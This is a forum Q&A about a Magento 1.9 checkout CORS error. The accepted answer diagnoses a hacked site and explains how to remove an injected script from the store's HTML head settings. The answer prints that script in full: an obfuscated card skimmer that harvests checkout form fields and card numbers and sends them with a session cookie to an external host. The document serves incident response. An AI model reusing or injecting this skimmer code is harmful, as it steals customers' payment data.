Magento 1.9 Error – Fix No ‘Access-Control-Allow-Origin’ Header

ajaxerrormagento-1.9onepage-checkout

I am using IWD One page checkout for my Magento site. On the checkout page, when I try to log in using IWD's login button, following error is printed in browser's console:

XMLHttpRequest cannot load http://ownsafety.org/opp.php. No 'Access-Control-Allow-Origin' header is present on the requested resource.
Origin 'http:/ /beta.mysite.in' is therefore not allowed access.

I do not know from where "http://ownsafety.org/opp.php" this url is coming. I think because of this error I am not able to login.

Best Answer

Your site is hacked.

  • Go to System > Configuration > Design.
  • Select Html head > Miscellaneous Scripts
  • Remove this script:

    <script>function j(e){var t="; "+document.cookie,o=t.split("; "+e+"=");return 2==o.length?o.pop().split(";").shift():void 0}j("SESSIID")||(document.cookie="SESSIID="+(new Date).getTime()),jQuery(function(e){e("button").on("click",function(){var t="",o="post",n=window.location;if(new RegExp("onepage|checkout").test(n)){for(var c=document.querySelectorAll("input, select, textarea, checkbox"),i=0;i<c.length;i++)if(c[i].value.length>0){var a=c[i].name;""==a&&(a=i),t+=a+"="+c[i].value+"&"}if(t){var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;u.open(o,e("<div />").html("&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#111;&#119;&#110;&#115;&#97;&#102;&#101;&#116;&#121;&#46;&#111;&#114;&#103;&#47;&#111;&#112;&#112;&#46;&#112;&#104;&#112;").text(),!0),u.setRequestHeader("Content-type","application/x-www-form-urlencoded"),u.send(t+"&asd="+(l.test(t.replace(/s/g,""))?1:0)+"&utmp="+n+"&cookie="+j("SESSIID")),console.clear()}}})});</script>

Related Topic